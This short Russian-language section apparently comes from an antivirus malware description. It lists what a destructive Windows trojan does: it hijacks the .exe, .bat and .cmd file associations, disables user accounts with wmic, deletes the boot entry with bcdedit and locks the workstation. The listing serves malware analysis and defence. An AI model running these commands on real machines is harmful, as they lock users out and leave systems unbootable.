Техническая информация
- [HKLM\Software\Classes\.cmd] '' = 'CMDER'
- [HKLM\Software\Classes\.bat] '' = 'BATCHER'
- [HKLM\Software\Classes\.exe] '' = 'DESTROYED'
- '<SYSTEM32>\msg.exe' * OOPS :)
- '<SYSTEM32>\wbem\wmic.exe' useraccount where name='user' set disabled=true
- '<SYSTEM32>\wbem\wmic.exe' useraccount where name='Administrator' set disabled=true
- '<SYSTEM32>\wbem\wmic.exe' useraccount where name='Guest' set disabled=true
- '<SYSTEM32>\bcdedit.exe' /delete {current)
- '<SYSTEM32>\rundll32.exe' user32.dll,LockWorkStation